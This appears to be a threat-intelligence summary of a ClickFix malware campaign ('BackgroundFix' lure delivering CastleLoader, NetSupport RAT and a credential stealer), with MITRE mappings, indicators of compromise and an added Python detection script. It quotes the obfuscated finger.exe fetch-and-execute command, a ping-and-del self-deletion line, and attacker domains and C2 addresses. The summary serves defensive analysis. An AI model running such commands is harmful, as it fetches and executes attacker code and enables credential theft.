ClickFix Removes Your Background but Leaves the Malware

A malicious “BackgroundFix” image-editing site lures victims into pasting a clipboard command that stages CastleLoader, which then drops NetSupport RAT and a custom .NET stealer dubbed CastleStealer to exfiltrate browser credentials, wallet data, Telegram sessions, and screenshots. The chain employs reflective PE loading, process hollowing, APC injection, layered RC4/ChaCha20/AES encryption for C2 and payloads, and numerous evasions; indicators include specific payload URLs, domains, IP:port C2s, and file hashes. #CastleLoader #CastleStealer

Keypoints

  • BackgroundFix sites present a fake image-background removal UI that, after a victim checks “I’m not a robot”, copies a malicious cmd payload to the clipboard and beacons telemetry to the actor’s log-checkbox.php.
  • The initial ClickFix-based payload uses finger.exe to fetch and execute a batch payload from an attacker-controlled fingerd server (cheeshomireciple[.]com), which stages CastleLoader rather than uploading or processing any image.
  • CastleLoader deploys a multi-stage pipeline: a Python-based downloader that runs XOR/RC4-encrypted shellcode, a first-stage shellcode that abuses ReplaceTextW to execute decrypted payloads, and a reflective PE loader that maps an embedded PE and rewrites the PEB before execution.
  • Delivered payloads include NetSupport RAT (disk persistence via Scheduled Task) and CastleStealer, an obfuscated .NET stealer that harvests Chromium/Firefox credentials, wallet IndexedDB vaults, Telegram tdata, and takes screenshots for exfiltration.
  • The loader and stealer use multiple evasions: direct NtAllocateVirtualMemory calls to bypass VirtualAlloc hooks, API hashing and string XOR obfuscation, Russian-locale kill-switch, Restart Manager for locked files, and process hollowing/APC injection into PowerShell.
  • Network and forensic IOCs are explicit and actionable: several hxxps payload/C2 domains (trindastal, obelnamevalf, brionter), the CastleStealer C2 IP 38.146.28[.]30:22989, payload hashes, and a campaign UUID and auth token; mitigations include disabling Run dialog, blocking outbound TCP/79, and enforcing Chrome App-Bound Encryption (ABE).

MITRE Techniques

  • [T1204] User Execution – Victim interaction triggers the chain when the user checks the “I’m not a robot” box and pastes a clipboard command: (‘%COMSPEC% /k s^t^a^r^t "" /min for /f "skip=8 delims=" %h in ('f^^i^^n^^g^^e^^r nrLeDHDESi@cheeshomireciple[.]com') do call %h & exit …’).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – The attack uses cmd.exe batch constructs and chained for/call execution to run fetched commands: (‘%COMSPEC% /k s^t^a^r^t "" /min for /f "skip=8 delims=" %h in ('f^^i^^n^^g^^e^^r …') do call %h’).
  • [T1105] Ingress Tool Transfer – Multiple stages and legitimate utilities are fetched from the web (e.g., Python embeddable and subsequent payloads): (‘curl.exe downloads the legitimate Python Software Foundation embeddable distribution from python.org, saving it with a .pdf extension’).
  • [T1218] Signed Binary Proxy Execution (regsvr32 / proxy execution) – The loader references a signed-binary style launch method intended to invoke regsvr32, though mis-encoded here: (‘launch_method: 4 is supposed to invoke regsvr32.exe. The XOR-decoded helper string in the binary actually spells regsrv32.exe’).
  • [T1055] Process Injection – The loader and stealer perform in-memory injection techniques including APC injection and process hollowing into PowerShell: (‘…launch method 7 for APC injection…’ and ‘process hollowing into PowerShell’).
  • [T1113] Screen Capture – The loader/stealer captures desktop screenshots for exfiltration as part of task workflows: (‘capture a desktop screenshot for exfiltration’).
  • [T1555.003] Credentials from Web Browsers – CastleStealer extracts Chromium login databases, cookies, Local State DPAPI/AES master keys, and IndexedDB wallet vaults: (‘reads Login Data (the SQLite password store), cookies.sqlite, and Local State (which contains the AES master key encrypted with DPAPI)’).
  • [T1070] Indicator Removal on Host (Self-deletion) – The malware cleans up via a self-delete batch trick using ping delay and del: (‘cmd.exe /C ping 1.0.0.1 & del ""’).
  • [T1041] Exfiltration Over C2 Channel – The stealer and loader send host fingerprints, screenshots, and task results over encrypted channels and a raw TCP C2: (‘traffic to 38.146.28[.]30:22989 runs over a raw TCP socket’).
  • [T1027] Obfuscated Files or Information – Multiple layers of string obfuscation, XOR/RC4/ChaCha20/AES encryption, and a custom .NET string decryptor hinder static analysis: (‘Every meaningful string constant in the binary is wrapped in a call to a custom decryptor’ and RC4/ChaCha20 usage descriptions).
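The command-line patterns quoted in the Keypoints and MITRE sections above (caret-escaped finger.exe fetch chained through for /f … do call, the ping-then-del self-deletion, and a curl.exe download saved under a document-like extension) can be turned into process-creation detections. The following is an added example written for this summary, not code from the Huntress write-up or from the malware: it strips cmd.exe caret escapes before matching, runs over a few constructed events with placeholder hostnames, and treats an explorer.exe parent (the Run dialog) as a heuristic boost. All event data, rule names and the `interactive_launch` heuristic are assumptions of this example.

```python
"""Detection logic for the ClickFix/CastleLoader command-line patterns:
finger.exe used as a downloader, ping-and-del self-deletion, and a curl.exe
download written with a document-like extension. Hypothetical helper code
run over constructed process-creation events (parent image, command line)."""
import re
from typing import Dict, List, Tuple

# Constructed sample events; hostnames and paths are placeholders, not IOCs.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    # 0: caret-obfuscated finger fetch, chained through for /f ... do call
    ("explorer.exe",
     r"""%COMSPEC% /k s^t^a^r^t "" /min for /f "skip=8 delims=" %h in ('f^^i^^n^^g^^e^^r user@finger.example') do call %h & exit"""),
    # 1: ping used as a sleep before deleting the dropped file
    ("cmd.exe", r'cmd.exe /C ping 1.0.0.1 & del "C:\Users\Public\stage.exe"'),
    # 2: archive downloaded with curl.exe but saved as a .pdf
    ("cmd.exe", r'curl.exe -o "%TEMP%\python.pdf" https://files.example/python-embed.zip'),
    # 3 and 4: benign activity that must not alert
    ("explorer.exe", r"C:\Windows\System32\notepad.exe C:\Users\alice\notes.txt"),
    ("cmd.exe", r"ping 8.8.8.8 -n 4"),
]


def normalize_cmdline(cmd: str) -> str:
    """Remove cmd.exe caret escapes (s^t^a^r^t -> start, f^^i^^n^^g^^e^^r ->
    finger), collapse whitespace and lowercase, so regexes match the
    de-obfuscated command the shell actually executes."""
    return re.sub(r"\s+", " ", cmd.replace("^", "")).strip().lower()


# Rules evaluated on the normalized command line.
RULES = {
    # finger(.exe) with a user@host argument: outbound TCP/79 used as a downloader
    "finger_fetch": re.compile(r"\bfinger(?:\.exe)?\s+\S+@\S+"),
    # for /f loop whose body executes each fetched line
    "for_f_call_chain": re.compile(r"\bfor /f\b.*\bdo call\b"),
    # ping used as a delay, followed by del on the same command line
    "ping_del_self_delete": re.compile(r"\bping\b[^&|]*[&|]+\s*del\b"),
}
# curl.exe output file with a document/image extension ...
DOC_OUTPUT = re.compile(
    r"\bcurl(?:\.exe)?\b.*?(?:-o|--output)\s+\"?[^\"\s]+\.(?:pdf|jpg|jpeg|png|txt|docx?)\b")
# ... while the URL actually points at an archive or executable
BINARY_URL = re.compile(r"https?://\S+?\.(?:zip|exe|dll|msi)\b")


def classify_event(parent: str, cmd: str) -> List[str]:
    """Return the names of all rules that fire for one process-creation event."""
    norm = normalize_cmdline(cmd)
    hits = [name for name, rx in RULES.items() if rx.search(norm)]
    if DOC_OUTPUT.search(norm) and BINARY_URL.search(norm):
        hits.append("renamed_download")
    # Heuristic (assumption of this example): a hit whose parent is explorer.exe
    # is consistent with a command pasted into the Win+R Run dialog.
    if hits and parent.lower() == "explorer.exe":
        hits.append("interactive_launch")
    return hits


def scan_events(events: List[Tuple[str, str]] = SAMPLE_EVENTS) -> Dict[int, List[str]]:
    """Map event index -> matched rule names, for events with at least one hit."""
    findings: Dict[int, List[str]] = {}
    for idx, (parent, cmd) in enumerate(events):
        hits = classify_event(parent, cmd)
        if hits:
            findings[idx] = hits
    return findings


if __name__ == "__main__":
    for idx, hits in scan_events().items():
        print(f"event {idx}: {', '.join(hits)}")
```

Running the module prints the three constructed malicious events with their rule names and stays silent on the two benign ones. Caret stripping is the important step: the quoted payload spells finger as `f^^i^^n^^g^^e^^r`, so a rule that matches the raw command line for `finger` never fires.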

Indicators of Compromise

  • [File hash] payload identification – bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92, ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9.
  • [URL / Domain] payload and C2 infrastructure – hxxps://trindastal[.]com/8250d149-9bf8-566d-9d7d-ea925eae0a4c/, hxxps://obelnamevalf[.]org/OaTS7yE9zd/default, and other BackgroundFix domains such as bg-transparency[.]online and bg-ready[.]online (and several more listed in the article).
  • [IP:Port] active C2 endpoints – 38.146.28[.]30:22989 (CastleStealer C2); NetSupport RAT C2 examples include poronto[.]com:688 and giovettiadv[.]com:688.
  • [File path] persistence / install locations – %ProgramData%\CeoliauDDabkina (NetSupport install path), and staged payload names like net40.bin (CastleStealer) and client32.exe (NetSupport client inside ZIP).
  • [Filenames] delivered payloads and stages – net40.bin (obfuscated .NET stealer), client32.exe (NetSupport), the Python embeddable distribution renamed with a .pdf extension, and stage URLs such as the /loc8 and /v8 endpoints on trindastal[.]com.
  • [Campaign identifiers / tokens] build and auth artifacts – campaign UUID b47e1791-82ba-544f-9aab-ebbdd36d8c89 and auth token/user-agent D63TnQ3WhSnjI0yVKaILRu8U1WttdnE used by CastleLoader.


Read more: https://www.huntress.com/blog/clickfix-castleloader-backgroundfix